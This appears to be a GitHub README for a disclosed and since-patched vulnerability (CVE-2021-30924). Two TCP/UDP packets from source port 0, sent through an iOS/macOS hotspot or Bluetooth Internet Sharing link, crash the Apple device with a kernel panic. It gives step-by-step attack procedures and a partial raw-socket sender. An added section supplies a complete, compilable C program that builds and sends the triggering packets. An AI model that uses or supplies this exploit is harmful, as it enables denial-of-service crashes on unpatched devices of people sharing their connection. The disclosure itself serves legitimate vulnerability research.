This repo demonstrates a method to cause a kernel panic (DoS) on iOS, macOS and iPadOS devices by sending 2+ TCP/UDP packets from an attacker device through the Apple device's hotspot network to an external network. The issue was discovered at , reproduced on in September 2021, and reported to Apple on 14 September 2021.
UPD:
- 25 Oct 2021: Apple fixed the issue in iOS and iPadOS 15.1 and macOS 12.0 without any public acknowledgement of our team.
- 18 Nov 2021: Apple mentioned our names in CVE-2021-30924, for macOS only, without any other communication with our team.
Kernel panic after the attacker sends 2+ TCP/UDP packets through the Apple device's hotspot network to an external network.

Hotspot:
- Switch the victim Apple device into hotspot mode
- The attacker connects to the iPhone's hotspot network
- The attacker sends 2+ TCP/UDP packets from source port 0 to different destination ports in the external network
- Kernel panic

Internet Sharing (Bluetooth PAN):
- Requires internet access on the victim device
- Turn on "Internet Sharing" (over Bluetooth PAN) on the victim Apple device
- Bluetooth-pair the attacker device and the victim Apple device
- The attacker connects to the internet via the Apple device
- The attacker sends 2+ TCP/UDP packets from source port 0 to different destination ports in the external network
- Kernel panic
We used raw sockets to build custom packets and send them from source port 0. The relevant part of the sender:

```c
...
tcph->source = htons(0);           /* source port 0 */
...
while (1)
{
    tcph->dest = htons(rand());    /* random destination port for each packet */
    if (sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin)) < 0)
    {
        perror("sendto failed");
    }
    else
    {
        printf("Packet Send. Length : %d \n", iph->tot_len);
    }
    sleep(1);                      /* one packet per second */
}
...
```
After two packets have been sent (two "Packet Send..." lines printed), the victim device panics, and the ELF can be terminated.
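The snippet above elides the packet construction. What follows is an added example written for this page, not the authors' code: a complete raw-socket sender that produces the traffic pattern used in both procedures (Hotspot and Internet Sharing over Bluetooth PAN), namely TCP packets from source port 0 to a different random destination port once per second. It assumes Linux raw sockets with IP_HDRINCL and root privileges, and takes the attacker's address on the shared network and an external host address as command-line arguments (placeholders); the SYN flag, window size and IP id are arbitrary choices. The checksum helpers are there because with IP_HDRINCL the Linux kernel fills in the IP header checksum but not the TCP checksum.

```c
/* Added example (not the repository's own code): a complete raw-socket sender
 * that emits IPv4/TCP SYNs from source port 0 to a different random destination
 * port once per second. Assumes Linux raw sockets, IP_HDRINCL and root. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Local header layouts (no dependency on platform netinet field names); all multi-byte fields are network order. */
struct ip_hdr {
    uint8_t ver_ihl, tos; uint16_t tot_len, id, frag_off;
    uint8_t ttl, protocol; uint16_t check;
    uint32_t saddr, daddr;
} __attribute__((packed));
struct tcp_hdr {
    uint16_t source, dest; uint32_t seq, ack_seq;
    uint8_t doff_res, flags; uint16_t window, check, urg_ptr;
} __attribute__((packed));
#define PKT_LEN (sizeof(struct ip_hdr) + sizeof(struct tcp_hdr))

/* Internet checksum (RFC 1071), returned in host order (store with htons()); recomputing over data that carries it yields 0. */
uint16_t inet_checksum(const void *data, size_t len) {
    const uint8_t *p = data;
    uint32_t sum = 0;
    for (; len > 1; len -= 2, p += 2)
        sum += (uint32_t)((p[0] << 8) | p[1]);
    if (len)
        sum += (uint32_t)(p[0] << 8);
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* TCP checksum over the IPv4 pseudo-header (src, dst, zero, proto, TCP length) plus the TCP header; IP_HDRINCL does not fill it in. */
uint16_t tcp_checksum(uint32_t saddr, uint32_t daddr, const struct tcp_hdr *tcph) {
    uint8_t buf[12 + sizeof(struct tcp_hdr)];
    uint16_t tcp_len = htons((uint16_t)sizeof(struct tcp_hdr));
    memcpy(buf, &saddr, 4);
    memcpy(buf + 4, &daddr, 4);
    buf[8] = 0;
    buf[9] = IPPROTO_TCP;
    memcpy(buf + 10, &tcp_len, 2);
    memcpy(buf + 12, tcph, sizeof(*tcph));
    return inet_checksum(buf, sizeof(buf));
}

/* Writes one IPv4/TCP SYN from source port 0 to dst_port into buf (PKT_LEN bytes), checksums filled in; returns the length. */
size_t build_port0_packet(uint8_t *buf, uint32_t saddr, uint32_t daddr, uint16_t dst_port) {
    struct ip_hdr *iph = (struct ip_hdr *)buf;
    struct tcp_hdr *tcph = (struct tcp_hdr *)(buf + sizeof(struct ip_hdr));
    memset(buf, 0, PKT_LEN);
    tcph->source = htons(0);          /* source port 0: the trigger */
    tcph->dest = htons(dst_port);     /* a different port every packet */
    tcph->doff_res = 5 << 4;          /* 20-byte header, no options */
    tcph->flags = 0x02;               /* SYN (arbitrary choice) */
    tcph->window = htons(5840);
    iph->ver_ihl = (4 << 4) | 5;      /* IPv4, 20-byte header */
    iph->tot_len = htons((uint16_t)PKT_LEN);
    iph->id = htons(54321);
    iph->ttl = 64;
    iph->protocol = IPPROTO_TCP;
    iph->saddr = saddr;
    iph->daddr = daddr;
    tcph->check = htons(tcp_checksum(saddr, daddr, tcph));
    iph->check = htons(inet_checksum(iph, sizeof(*iph)));
    return PKT_LEN;
}

int main(int argc, char **argv) {
    if (argc != 3) {
        fprintf(stderr, "usage (as root): %s <attacker-ip> <external-host-ip>\n", argv[0]);
        return 1;
    }
    uint32_t saddr = inet_addr(argv[1]), daddr = inet_addr(argv[2]);
    int s = socket(AF_INET, SOCK_RAW, IPPROTO_TCP), one = 1;
    if (s < 0 || setsockopt(s, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0) {
        perror("raw socket (needs root)");
        return 1;
    }
    struct sockaddr_in sin = { .sin_family = AF_INET, .sin_addr.s_addr = daddr };
    uint8_t pkt[PKT_LEN];
    srand((unsigned)time(NULL));
    for (;;) {                        /* the README reports a panic after two packets */
        uint16_t dport = (uint16_t)rand();
        size_t len = build_port0_packet(pkt, saddr, daddr, dport);
        if (sendto(s, pkt, len, 0, (struct sockaddr *)&sin, sizeof(sin)) < 0)
            perror("sendto failed");
        else
            printf("Packet Send. Length : %zu, dest port %u\n", len, (unsigned)dport);
        sleep(1);
    }
}
```

The README lists TCP/UDP; this example sends TCP only. It is written for the Linux attacker platform the README names: on macOS/BSD, raw sockets with IP_HDRINCL expect the IP total length field in host byte order, so the packet builder would need that one change there.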
The attacker tool runs on Linux-based systems (tested on Ubuntu 21.04).
Elaman Iskakov - @darling_x0r
Alexey Katkov - @watman27